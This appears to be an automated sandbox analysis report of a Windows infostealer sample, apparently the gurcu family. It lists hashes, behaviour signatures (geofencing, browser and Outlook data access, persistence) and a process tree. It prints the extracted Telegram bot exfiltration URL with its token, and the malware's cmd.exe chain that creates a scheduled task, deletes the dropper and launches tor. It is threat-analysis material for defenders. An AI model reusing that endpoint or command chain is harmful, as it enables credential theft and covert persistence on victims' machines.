Resubmissions
10-04-2024 02:41
240410-c6hmmsfd7z 1010-04-2024 02:41
240410-c6g14scb46 1010-04-2024 02:41
240410-c6gqcacb45 1010-04-2024 02:41
240410-c6f4tacb44 1014-10-2023 01:33
231014-bysbfahh6s 10Analysis
-
max time kernel
149s -
max time network
161s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
14-10-2023 01:33
Behavioral task
behavioral1
Sample
x19a4f9f3d16fcc9779ba8ea79bf7.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
x19a4f9f3d16fcc9779ba8ea79bf7.exe
Resource
win10v2004-20230915-en
General
-
Target
x19a4f9f3d16fcc9779ba8ea79bf7.exe
-
Size
392KB
-
MD5
2299a17350433284e58bd0fcc10edf41
-
SHA1
d477f1cd55365db00ca77cc5459afabe1ffc80b3
-
SHA256
c3439dd56bcf3921cdbfcbdff3f928d14ebd632b3411235657bf9f5452c1ab9d
-
SHA512
123d18cf17b4bb0f0b16414039c2381f77e9f12c96a109d5847c760e4d7fb64f6c592f8f185a4c0375aade6754afd0abd6a196936adac405290f157829ae25a1
-
SSDEEP
6144:5cJGLvLE5hu6Me646G0D1ecme1x9b31v4n:uUvLr6k9b5ecmed1v4
Malware Config
Extracted
gurcu
https://api.telegram.org/bot6193093056:AAHzyNGUGS9aUG6CCx6ENLoXpCFLzEQywIQ/sendMessage?chat_id=1098292643
Signatures
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation x19a4f9f3d16fcc9779ba8ea79bf7.exe Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation x19a4f9f3d16fcc9779ba8ea79bf7.exe Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation x19a4f9f3d16fcc9779ba8ea79bf7.exe -
Executes dropped EXE 5 IoCs
pid Process 3372 x19a4f9f3d16fcc9779ba8ea79bf7.exe 1932 x19a4f9f3d16fcc9779ba8ea79bf7.exe 3136 tor.exe 1152 x19a4f9f3d16fcc9779ba8ea79bf7.exe 4920 tor.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 x19a4f9f3d16fcc9779ba8ea79bf7.exe Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 x19a4f9f3d16fcc9779ba8ea79bf7.exe Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 x19a4f9f3d16fcc9779ba8ea79bf7.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 428 schtasks.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4124 PING.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 3372 x19a4f9f3d16fcc9779ba8ea79bf7.exe 3372 x19a4f9f3d16fcc9779ba8ea79bf7.exe 1152 x19a4f9f3d16fcc9779ba8ea79bf7.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1956 x19a4f9f3d16fcc9779ba8ea79bf7.exe Token: SeDebugPrivilege 3372 x19a4f9f3d16fcc9779ba8ea79bf7.exe Token: SeDebugPrivilege 1932 x19a4f9f3d16fcc9779ba8ea79bf7.exe Token: SeDebugPrivilege 1152 x19a4f9f3d16fcc9779ba8ea79bf7.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3372 x19a4f9f3d16fcc9779ba8ea79bf7.exe 1152 x19a4f9f3d16fcc9779ba8ea79bf7.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 1956 wrote to memory of 4428 1956 x19a4f9f3d16fcc9779ba8ea79bf7.exe 87 PID 1956 wrote to memory of 4428 1956 x19a4f9f3d16fcc9779ba8ea79bf7.exe 87 PID 4428 wrote to memory of 4908 4428 cmd.exe 88 PID 4428 wrote to memory of 4908 4428 cmd.exe 88 PID 4428 wrote to memory of 4124 4428 cmd.exe 89 PID 4428 wrote to memory of 4124 4428 cmd.exe 89 PID 4428 wrote to memory of 428 4428 cmd.exe 91 PID 4428 wrote to memory of 428 4428 cmd.exe 91 PID 4428 wrote to memory of 3372 4428 cmd.exe 92 PID 4428 wrote to memory of 3372 4428 cmd.exe 92 PID 3372 wrote to memory of 3092 3372 x19a4f9f3d16fcc9779ba8ea79bf7.exe 95 PID 3372 wrote to memory of 3092 3372 x19a4f9f3d16fcc9779ba8ea79bf7.exe 95 PID 3372 wrote to memory of 3136 3372 x19a4f9f3d16fcc9779ba8ea79bf7.exe 99 PID 3372 wrote to memory of 3136 3372 x19a4f9f3d16fcc9779ba8ea79bf7.exe 99 PID 1152 wrote to memory of 4920 1152 x19a4f9f3d16fcc9779ba8ea79bf7.exe 107 PID 1152 wrote to memory of 4920 1152 x19a4f9f3d16fcc9779ba8ea79bf7.exe 107 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 x19a4f9f3d16fcc9779ba8ea79bf7.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 x19a4f9f3d16fcc9779ba8ea79bf7.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\x19a4f9f3d16fcc9779ba8ea79bf7.exe"C:\Users\Admin\AppData\Local\Temp\x19a4f9f3d16fcc9779ba8ea79bf7.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "x19a4f9f3d16fcc9779ba8ea79bf7" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\TeamViewer\x19a4f9f3d16fcc9779ba8ea79bf7.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\x19a4f9f3d16fcc9779ba8ea79bf7.exe" &&START "" "C:\Users\Admin\AppData\Local\TeamViewer\x19a4f9f3d16fcc9779ba8ea79bf7.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4428 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:4908
-
-
C:\Windows\system32\PING.EXEping 127.0.0.13⤵
- Runs ping.exe
PID:4124
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "x19a4f9f3d16fcc9779ba8ea79bf7" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\TeamViewer\x19a4f9f3d16fcc9779ba8ea79bf7.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:428
-
-
C:\Users\Admin\AppData\Local\TeamViewer\x19a4f9f3d16fcc9779ba8ea79bf7.exe"C:\Users\Admin\AppData\Local\TeamViewer\x19a4f9f3d16fcc9779ba8ea79bf7.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:3372 -
C:\Windows\System32\tar.exe"C:\Windows\System32\tar.exe" -xvzf "C:\Users\Admin\AppData\Local\Temp\tmp141F.tmp" -C "C:\Users\Admin\AppData\Local\xtioxntk7k"4⤵PID:3092
-
-
C:\Users\Admin\AppData\Local\xtioxntk7k\tor\tor.exe"C:\Users\Admin\AppData\Local\xtioxntk7k\tor\tor.exe" -f "C:\Users\Admin\AppData\Local\xtioxntk7k\torrc.txt"4⤵
- Executes dropped EXE
PID:3136
-
-
-
-
C:\Users\Admin\AppData\Local\TeamViewer\x19a4f9f3d16fcc9779ba8ea79bf7.exeC:\Users\Admin\AppData\Local\TeamViewer\x19a4f9f3d16fcc9779ba8ea79bf7.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
C:\Users\Admin\AppData\Local\TeamViewer\x19a4f9f3d16fcc9779ba8ea79bf7.exeC:\Users\Admin\AppData\Local\TeamViewer\x19a4f9f3d16fcc9779ba8ea79bf7.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Users\Admin\AppData\Local\xtioxntk7k\tor\tor.exe"C:\Users\Admin\AppData\Local\xtioxntk7k\tor\tor.exe" -f "C:\Users\Admin\AppData\Local\xtioxntk7k\torrc.txt"2⤵
- Executes dropped EXE
PID:4920
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
847B
MD53308a84a40841fab7dfec198b3c31af7
SHA14e7ab6336c0538be5dd7da529c0265b3b6523083
SHA256169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e
SHA51297521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198
-
Filesize
392KB
MD52299a17350433284e58bd0fcc10edf41
SHA1d477f1cd55365db00ca77cc5459afabe1ffc80b3
SHA256c3439dd56bcf3921cdbfcbdff3f928d14ebd632b3411235657bf9f5452c1ab9d
SHA512123d18cf17b4bb0f0b16414039c2381f77e9f12c96a109d5847c760e4d7fb64f6c592f8f185a4c0375aade6754afd0abd6a196936adac405290f157829ae25a1
-
Filesize
392KB
MD52299a17350433284e58bd0fcc10edf41
SHA1d477f1cd55365db00ca77cc5459afabe1ffc80b3
SHA256c3439dd56bcf3921cdbfcbdff3f928d14ebd632b3411235657bf9f5452c1ab9d
SHA512123d18cf17b4bb0f0b16414039c2381f77e9f12c96a109d5847c760e4d7fb64f6c592f8f185a4c0375aade6754afd0abd6a196936adac405290f157829ae25a1
-
Filesize
392KB
MD52299a17350433284e58bd0fcc10edf41
SHA1d477f1cd55365db00ca77cc5459afabe1ffc80b3
SHA256c3439dd56bcf3921cdbfcbdff3f928d14ebd632b3411235657bf9f5452c1ab9d
SHA512123d18cf17b4bb0f0b16414039c2381f77e9f12c96a109d5847c760e4d7fb64f6c592f8f185a4c0375aade6754afd0abd6a196936adac405290f157829ae25a1
-
Filesize
392KB
MD52299a17350433284e58bd0fcc10edf41
SHA1d477f1cd55365db00ca77cc5459afabe1ffc80b3
SHA256c3439dd56bcf3921cdbfcbdff3f928d14ebd632b3411235657bf9f5452c1ab9d
SHA512123d18cf17b4bb0f0b16414039c2381f77e9f12c96a109d5847c760e4d7fb64f6c592f8f185a4c0375aade6754afd0abd6a196936adac405290f157829ae25a1
-
Filesize
13.3MB
MD589d2d5811c1aff539bb355f15f3ddad0
SHA15bb3577c25b6d323d927200c48cd184a3e27c873
SHA256b630008f6d3887793d48b87091e56691e292894dd4fa100dc4a418a2f29dcc12
SHA51239e576124c54143520c5435a2ef9b24506131e13403489c0692f09b89135015d611c4988d4772f8a1e6557fa68b4667d467334461009cee8c2227dfc3e295289
-
Filesize
2.7MB
MD5b3ef94a3423ec1d2c0b63d3eff9c9fff
SHA174ba4b10cfb9ca4ee1b3c6bc318a5c765cf49df2
SHA2568e17bbec63e22d1c3874023ba932ea3e03dbcc8116925fe893ff479d4bcfd9f1
SHA512f6f1a685cb0844f82152da13f86042f8bd321f73cc0742c96cc8e14a55c53a9dd0cc227249f9bb60899d911e31ae4b28f72345957390e3a5c006e22cd57a6742
-
Filesize
17.6MB
MD538c22e6f9ed628053ead296182d952ac
SHA128e03e5d648c0fcccc720b45d2ac45b1ba0e1af9
SHA256836132fe182279e1ac22b570bfc38dbcfbf346d756151e4514fd478a753e9ec6
SHA5122deeb260f49cbb3b76a6e4ef27bad5461f5ff6155aa60566705d6d0400bca818d5b1b21d3cf1fcddab5bd2df64a3a2cdd931a7cbb11d21e2cc78382ae8463b8f
-
Filesize
64B
MD5a8b78779e95434dc06a80c76f4b0da9c
SHA13db8aff20ce23ebd9ae3a3d54b2febf69b1be486
SHA2565eca0d53e44f57eb9d238044ce9b25429e714cdb98a59bc30a5a3d54b0952f12
SHA5123e887d61f4a8f585000f42d6903c4eaefb68146329e578cb3a28bcf97c1f5bae6c1580a31797497154b1d4cfec52fdbcc2f011087f78842ca3a222c133075715
-
Filesize
4B
MD53a24b25a7b092a252166a1641ae953e7
SHA1570a3e528618d879ad7ec0179beb7b3dede2d331
SHA256f18af665c04861d0e2d82a1fd57687173267c064b089c264caaef3359daf7372
SHA512ed7b3018966f3dd044b570750a3fc268a154c9ae27bcf19d1a65f54c00e3ae9f1befa3ea84214c9d3760b07ec16a9ca1ca844f36e45c95ede8f078c0d34071c3
-
Filesize
7.4MB
MD588590909765350c0d70c6c34b1f31dd2
SHA1129b27c3926e53e5df6d44cc6adf39c3a8d9ebf7
SHA25646fe244b548265c78ab961e8f787bc8bf21edbcaaf175fa3b8be3137c6845a82
SHA512a8af08d9169a31a1c3419d4e6e8fbe608c800d323840563b5a560d3e09e78a492201f07cc0d3864efbff8ad81e59885fc43a6b749e0a3377aa8555df258af192
-
Filesize
7.4MB
MD588590909765350c0d70c6c34b1f31dd2
SHA1129b27c3926e53e5df6d44cc6adf39c3a8d9ebf7
SHA25646fe244b548265c78ab961e8f787bc8bf21edbcaaf175fa3b8be3137c6845a82
SHA512a8af08d9169a31a1c3419d4e6e8fbe608c800d323840563b5a560d3e09e78a492201f07cc0d3864efbff8ad81e59885fc43a6b749e0a3377aa8555df258af192
-
Filesize
7.4MB
MD588590909765350c0d70c6c34b1f31dd2
SHA1129b27c3926e53e5df6d44cc6adf39c3a8d9ebf7
SHA25646fe244b548265c78ab961e8f787bc8bf21edbcaaf175fa3b8be3137c6845a82
SHA512a8af08d9169a31a1c3419d4e6e8fbe608c800d323840563b5a560d3e09e78a492201f07cc0d3864efbff8ad81e59885fc43a6b749e0a3377aa8555df258af192
-
Filesize
218B
MD560018be57cd1d65d3da55194bb572159
SHA107dd761fa81f85b90d5464ad6d57b1f111b081a6
SHA25688a6ac7da833cff73111b4e282602144ff29eb4e8778ae5a67aee93a2f345490
SHA51237cf9cd9fc189d05969ceff36dd33da34c6320e2d7e5fa74e02576e1d71a436934d21c321cf109577e33cae14d2a8e3870e38d3dcc83845fa9e64b55e994eadf